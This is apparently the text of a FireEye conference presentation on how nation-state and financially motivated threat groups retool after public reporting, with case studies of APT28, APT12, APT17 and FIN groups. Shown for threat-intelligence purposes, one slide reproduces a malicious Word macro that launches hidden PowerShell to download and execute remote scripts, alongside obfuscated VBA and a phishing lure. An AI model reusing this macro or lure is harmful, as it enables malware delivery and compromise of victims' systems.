SESSION ID: TTA1-F04 ###### Marcin Siedlarz Senior Threat Intelligence Analyst Hide and Seek: How Threat FireEye, Inc. @siedlmar Actors Respond in the Face of Public Exposure Kristen Dennesen Senior Threat Intelligence Analyst FireEye, Inc. ----- ###### Have you ever been directly involved in a public white paper or blog about a threat actor? ----- ###### Do you use vendor white papers or blogs to develop better situational awareness about threats to your organization? ----- ###### “APT” Groups: Groups conducting network operations on behalf of a nation state. Includes cyber espionage and network attack activity. “FIN” Groups: Well organized, capable intrusion teams that conduct intrusions for financial gain. Seek to steal information that can be monetized. TTPs: “Tactics, Techniques and Procedures” – the “toolkit” and methods threat actors use to achieve their objectives. ----- ###### How do threat groups respond when their operations are exposed in public reporting? ? ----- #### Public exposure is a major trigger for behavioral change ----- ###### By the end of this presentation you’ll be able to… Evaluate the impact of a blog or white paper on an adversary’s future operations ----- ###### Introduction Key Concepts Case Studies Call to Action ----- ###### Computer network Intelligence collection vs. defense ----- ###### Public spotlight creates a flashpoint of awareness of a group’s ops, TTPS Security vendors sprint to detect publicized activity Net defenders more likely to hunt in their networks for evidence of a group, employ new IOCs or detection methods Exposure triggers public awareness and increases threat groups’ risk of ----- ###### What ethical boundaries and obligations do security researchers face? Are we cultivating better OPSEC in the actors we expose? What is the best way to share? Mission vs. Marketing ----- ###### Threat Shifting “Response from adversaries to perceived safeguards and/or countermeasures, in which the adversaries change some characteristic of their [operations] in order to avoid and/or overcome those safeguards/countermeasures” — NIST Special Publication 800-30: Guide for Conducting Risk Assessments ----- ###### Evolution to reduce the risk of predation Mimickry: Heliconius butterflies mimic wing coloration patterns to signal toxicity to predators ----- ###### Examples of Threat Shifting Evolution of banking Trojans from clumsy keyloggers to highly flexible webinject offerings Adoption of Powershell and WMI for lateral movement and backdoor functionality ----- ###### Threat shifting occurs across four domains: PLANNING & TIMING TARGETS RESOURCES METHODS ----- ###### Exposure Remediation Detection ----- ###### Our observations are based on FireEye’s visibility. ----- ###### How do threat groups respond when their operations are exposed in public reporting? ? ----- ### They know. ###### Threat groups are often keenly aware of research & reporting on their operations. ----- ###### APT28 signals they are aware of security researchers’ blogs (and none too pleased…) July 2015 blog on APT28 spear phishing campaign that leveraged a Java zero-day Within 1 day, APT28 updated DNS info for domain hosting exploit to point to TrendMicro’s IP space ----- ###### Threat Actors Read the News, Too. APT1: Major interruption to APT1’s operations Careto/Mask: “…after the post was published, the Mask operators shut everything down within about four hours” APT3 aka UPS: Changed tactics on the fly in direct response to FireEye blog ----- ###### APT29 aka the Dukes, CozyDuke, TEMP.Monkey, Cozy Bear Security researchers likely analyzing samples; probing staging server July 7, 2015 July 14, 2015 Phish sent: National Payload files deleted from Endowment for Democracy ###### compromised server lure ###### July 8, 2015 July 3, 2015 July 14, 2015 Phish payload Downloader compiled submitted to VT ----- ###### Some actors actively seek to MANIPULATE public perception. ----- ###### Public reports can be deeply disruptive to a threat group’s operations… or not. ### Incentives matter. ----- ###### FIN4: Targeted 100+ organizations in seek of information that would convey a stock trading advantage ----- |Col1|FIN4 REPORT PUBLI| |---|---| ||Dec. 1, 2014| |Summer 2014 • Incident response at victims • Similar TTPS and targets Summer – Fall 2014 •|| ###### FIN4 REPORT PUBLISHED Dec. 1, 2014 Summer 2014 • Incident response at victims • Similar TTPS and targets Summer – Fall 2014 • FIN4 actively targeting new FIN4 DISCONTINUES OPS victims Dec. 2014 • Adds dozens of new targets in ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium APT28: global intelligence collection operation targeting information tightly aligned w/ Russian government interests. ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium 18-Sep-147-Nov-1427-Dec-1415-Feb-156-Apr-1526-May-1515-Jul-153-Sep-1523-Oct-1512-Dec-15 # 20+ ###### Reports examining APT28 TTPS Oct. 2014 – Oct. 2015 ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium 18-Sep-147-Nov-1427-Dec-1415-Feb-156-Apr-1526-May-1515-Jul-153-Sep-1523-Oct-1512-Dec-15 In spite of repeated exposure APT28 has sustained operations ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium March 2015 August 2015 December 2014 - Password reset theme - Abuse of Yahoo OAuth - Streamlined employing bit.ly service to enable redirection scripts - Links configured to phishing - Employed campaign look like legit Google - Phishing e-mails point to identifiers URLs legit Yahoo URL ----- ###### Opportunistic Requirements Driven vs. ----- ##### Public reports are a common trigger for retooling ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda Countries Targeted Industries Targeted Aerospace & Defense Business &Professional Services Australia Construction & Engineering Netherlands ###### Education Energy Financial Services & Insurance Egypt Taiwan ###### Government Organizations International Organizations Healthcare & Pharmaceuticals India Tunisia ## APT12 High Tech & IT ###### Media and Entertainment Active since at least 2009. ###### Retail and Consumer Goods Conducts cyber espionage for the United States Japan purposes of intelligence collection. Telecommunications ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda • Jan. 31, 2013: New York Times exposes APT12 intrusion in their environment - Exposure triggered brief pause in activity and immediate changes in TTPs • June 6, 2014: APT12’s RIPTIDE aka Etumbot backdoor is the subject of a comprehensive white paper **New York Times — Jan. 31, 2013** ###### - White paper triggered rapid shift in toolset. ----- |June 2014 Arbor Networks Paper on RIPTIDE aka Etumbot|Col2| |---|---| |H RIPTIDE aka Etumbot, Shoco|IGHTIDE| ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda June 2014 Arbor Networks Paper on RIPTIDE aka Etumbot HIGHTIDE RIPTIDE aka Etumbot, Shoco 4/1/12 10/18/12 5/6/13 11/22/13 6/10/14 12/27/14 7/15/15 1/31/16 ----- |June 2014 Arbor Networks Paper on RIPTIDE aka Etumbot|Col2| |---|---| |H RIPTIDE aka Etumbot, Shoco|WATERSPOUT IGHTIDE| ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda June 2014 Arbor Networks Paper on RIPTIDE aka Etumbot WATERSPOUT HIGHTIDE RIPTIDE aka Etumbot, Shoco 4/1/12 10/18/12 5/6/13 11/22/13 6/10/14 12/27/14 7/15/15 1/31/16 ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda RIPTIDE GET request ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda HIGHTIDE GET request ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda RIPTIDE traffic encryption: BASE64 RC4 ----- ###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda HIGHTIDE traffic encryption: BASE64 XOR + 12bytes “salt” RSA encrypted RC4 ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda Industries Targeted Aerospace & Defense Countries Targeted Business & Professional Services Construction & Engineering Energy Taiwan Financial Services & Insurance Germany ###### Government Organizations International Organizations High Tech & IT Japan United Kingdom ###### Media and Entertainment ## APT17 Retail & Consumer Goods ###### Telecommunications Conducts cyber espionage for the United States South Korea Transportation purposes of intellectual property theft. Frequently targets Japanese organizations ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda More than an exposure effort: - Coalition sought to eradicate specific ‘high value’ tools and make it more expensive for APT17 to operate - Coordinated action was accompanied by public materials to aid detection and educate victims Operation SMN coalition went into the effort with eyes wide open: - Acknowledged from outset that APT17 was skilled, equipped ----- ###### Operation SMN sought to KNOCK OUT APT17’S high value tools such as HIKIT ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda HIKIT August 2014 Legend **Timespan Observed** ###### Last observed HIKIT compile date (based on malware sample compile times) ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda HIKIT September 28, 2014 Legend Last observed sample created on Timespan Observed victim host File created on victim host ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda October 2014 Operation SMN Public Action HIKIT September 28, 2014 Legend Last observed sample created on Timespan Observed victim host File created on victim host ----- ###### October 2014 Operation SMN Public Action **HIKIT** ----- ###### October 2014 Operation SMN Public Action **MUGBRAIN** **RAYGUN** **HIKIT** ----- ###### October 2014 Operation SMN Public Action **SCARYMOVIE** **HIGHNOTE** **SIDEWINDER** **HIGHNOON aka Winnti** **MUGBRAIN** **RAYGUN** **HIKIT** **BLACKCOFFEE aka ZoxPNG** **LONEAGENT aka Fexel** **PHOTO aka Derusbi** **SOGU aka PlugX, Kabas** ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda October 2014 October 2014 Operation SMN Public ActionOperation SMN Public Action LONEAGENT aka Fexel **Legend** ###### z ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda October 2014 Operation SMN Public Action February 2015 APT17 begins consistently armorizing LONEAGENT samples ###### LONEAGENT aka Fexel **Legend** ###### z ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda Quick retooling and adaptation ----- ###### Suspected FIN threat actor rapidly changes TTPs after public reporting: “PUNCHBUGGY” ----- ----- ----- |8-9 March 2016: McAfee, Bromium blogs|Col2| |---|---| ||| ||| |9/3/15 10/23/15 12/12/15 1/31/16|3/21/16 5/10/16 6/29/16| ###### 8-9 March 2016: McAfee, Bromium blogs 7/15/15 9/3/15 10/23/15 12/12/15 1/31/16 3/21/16 5/10/16 6/29/16 8/18/16 ----- Source: https://blogs mcafee com/mcafee-labs/macro-malware-associated-dridex-finds-new-ways-hide/ ----- Source: https://labs bromium com/2016/03/09/macro-malware-connecting-to-github/ ----- |8-9 March 2016: McAfee, Bromium blogs 10 March 2016: TTPs shift 11 March 2016: PaloAltoNetwork’s report|Col2| |---|---| ||| |9/3/15 10/23/15 12/12/15 1/31/16|3/21/16 5/10/16 6/29/16| ###### 8-9 March 2016: McAfee, Bromium blogs 10 March 2016: TTPs shift 11 March 2016: PaloAltoNetwork’s report 7/15/15 9/3/15 10/23/15 12/12/15 1/31/16 3/21/16 5/10/16 6/29/16 8/18/16 ----- Attribute VB_Name = "NewMacros" Sub AutoOpen() Const HIDDEN_WINDOW = 0 strComputer = "." x1 = "Download" x2 = "String" Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process") objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) { (new-object Net.WebClient)." & x1 & x2 & "('https://github[.]com/consfw/msfw/raw/master/README') | iex } else { (new-object Net.WebClient)." & x1 & x2 & "('https://github[.]com/consfw/msfw/raw/master/TODO') | iex}", Null, objConfig, intProcessID End Sub ----- ###### Private Const WCmOFNHznPSAokywsh As String = "xQFPBbfIMjTtUhckEoudAVzYvgisNaHXDOSZLeq” Private Const AFPsxGjINKYLfVUvui As String = "KpvTdPCRFgoyJOucw” Private Const NvqAHROKeCVtWf As String = "lDtgNZkfMizcGIsBR” Private Const pcAFWyJEkv As String = "zkCLKVfGXWuBFlTMwOURYnIbhveNP” Private Const LNkFVBSQeDvznpmH As String = "XxqdyculNPvJrEDCAGhYUIbVmjMkRQ” Private Const ZoXxOaDMdzsglBV As String = "cIbXZqiBdKuSgETwHGoCWDefPhYpvALlzVrjysUmxNaQ” Private Const gyMRPIeKLJnsHuatlpc As String = "QOVAFGiBvIexypDbloSqcRhLszaEnZjWTMKPUYgrdwuHfJ” Private Const DKjYtIzTqvpuXPw As String = "mJbxngCeZtlksVEpiKHNBv” Private Const ULMYzFkgZpdqs As String = "NlpDMBhuRLOJvySeGzjsgwIVtfiZCdnqA” Private Const KbumUjRiJXrx As String = "jlbmaHhfdstKUgkDBC” Private Const LWSjdoRABU As String = "sEAeZptMyInzPVHjJoK” Private Const gnAcwqCyivtBsfVhm As String = "mOQsBrgUpENXMSTjhFDbCIWlk” Private Const YQbAcyLxgojHlrpUG As String = "HtCKmkRQTpv” Private Const TJWFglmHsLUDpVorbyB As String = "BiHwTdnKbGvVkrfMJIFouXUNqCmlaeL” And so on… ----- ----- |8-9 March 2016: McAfee, Bromium blogs 2 May 2016: TTPs shift|Col2|Col3| |---|---|---| |||| |||| |9/3/15 10/23/15 12/12/15 1/31/16 3/21/16||5/10/16 6/29/16| ###### 8-9 March 2016: McAfee, Bromium blogs 2 May 2016: TTPs shift 7/15/15 9/3/15 10/23/15 12/12/15 1/31/16 3/21/16 5/10/16 6/29/16 8/18/16 ----- ----- Private Function ieviAaZ296N3Ve() As String ieviAaZ296N3Ve = cin1A9DKSxWMDQT("taoeptIxicetj3td.rtBD.edfhIQ2ma/xse3/a/ar0/mc:DMh", 1575) End Function Private Function Z2rLBQGmQVZx() As String Z2rLBQGmQVZx = cin1A9DKSxWMDQT("t./d/caef:tFEBxx4aem.ae/phkI84t6imodcr/tHyPs7", 1455) End Function Private Function dMz9cDR9IkYHKjS() As String dMz9cDR9IkYHKjS = cin1A9DKSxWMDQT("}|3Mx ore)VDi'WY H3B", 184) End Function Public Function DA8Ystq() As String DA8Ystq = J8eLZoOB6mi9M & ORs8gh & ieviAaZ296N3Ve & kn8hbEV3 & Z2rLBQGmQVZx & dMz9cDR9IkYHKjS End Function Private Function J8eLZoOB6mi9M() As String J8eLZoOB6mi9M = cin1A9DKSxWMDQT(" xnefp-eietoi aBcooux elsw4kZcte-loo dHlSdWsp iPicEe.eroczz-io irnnd ywn-syylnte-xlhepwXZ", 7320) End Function Private Function kn8hbEV3() As String kn8hbEV3 = cin1A9DKSxWMDQT("'roDeeNjee} Ci(tl.iW bns |zDgSn)l.to(lx AindwtCtc-{ee)IHiaonbeew i'WV", 4214) End Function And so on … ----- ###### to: store subject: Hi, As discussed on the phone, I'm sending you the guest list and timing details with pre-order uploaded on dropbox. Would you be so kind as to review this request and let me know about your availability? hxxps://www.dropbox[.]com/s/XXXX/Reservation%20details% 20at%20.doc?dl=1 Would you be so kind as to review this request and let me know about your availability? Thanks! Michael. ----- ##### As part of retooling, threat actors can turn on a dime ----- ###### APT3 aka UPS, Gothic Panda Clandestine Wolf Blog June 23, 2015 One Day Later APT3 continued, with modifications: Created new phishing emails Removed mechanism to profile end user systems Modified filenames of files used for exploitation Altered shellcode Compiled new payloads with updated C2; increased ----- ###### The path of least resistance rules. #### “If it ain’t broke, don’t fix it.” ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda **May 2015** FireEye and Microsoft coordinate takedown of BLACKCOFFEE Technet abuse; Report technique publicly **C2 Location** ``` “@MICR0S0FT” “C0RP0RATI0N” ``` ----- ###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda **August 2015:** Modified BLACKCOFFEE variant targeting JP organizations **C2 Location** ``` “lOve yOu 4 eveR" "Reve 4 uOy evOl” ``` ----- ###### When needed, threat actors will add more resources to get the job done ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium 18-Sep-147-Nov-1427-Dec-1415-Feb-156-Apr-1526-May-1515-Jul-153-Sep-1523-Oct-1512-Dec-15 # 20+ ###### Reports examining APT28 TTPS Oct. 2014 – Oct. 2015 ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium _April 2015_ - CVE-2015-1701 Windows local privs. escalation vuln _July 2015_ - CVE-2015-2424 Microsoft _April 2015_ Office Zero-Day - CVE-2015-3043 Adobe Flash Zero-Day _July 2015_ - CVE-2015-2590 Java _October 2015_ Zero-Day - CVE-2015-7645 Adobe Flash Zero Day ----- ###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium APT28 continues to develop new tools • March 2015: new variant of CORESHELL • Dec. 2015: New Backdoor • Jan. 2016: New Launcher Image Source: Wellness GM @wellness photos on Flickr ----- ###### In Summary… ----- ###### Key Takeaways Threat actors are often keenly aware of reporting on their operations Exposure can disrupt an actor’s operations… if the incentives are right. Public reporting triggers retooling Actors may abandon tools or develop new ones. The path of least resistance is often king. Sometimes, actors solve the problem by adding resources: time, money, tool development ----- ###### Exposure is a balancing act Security researchers must continually weigh the benefits of public awareness against possible disruptions to detection and loss of visibility. When executed well, exposure benefits victims, network defenders and the security community at large. ----- ###### When evaluating whether exposing an adversary When evaluating how a threat actor will likely is the best course of action: respond when their operations are exposed: - What impact do we want to have on the adversary? - How adaptive and capable is the group? - How will exposure help/hurt victims and likely future - Groups with a flat toolset and low adaptive targets? capability are more likely to be disrupted - How will exposure impact ‘big picture’ concerns like - How determined are they to maintain access to law enforcement efforts? specific targets? - Will exposure degrade our ability to detect and - What shifts to targeting, timing, resourcing & TTPs ----- ###### Thank you -----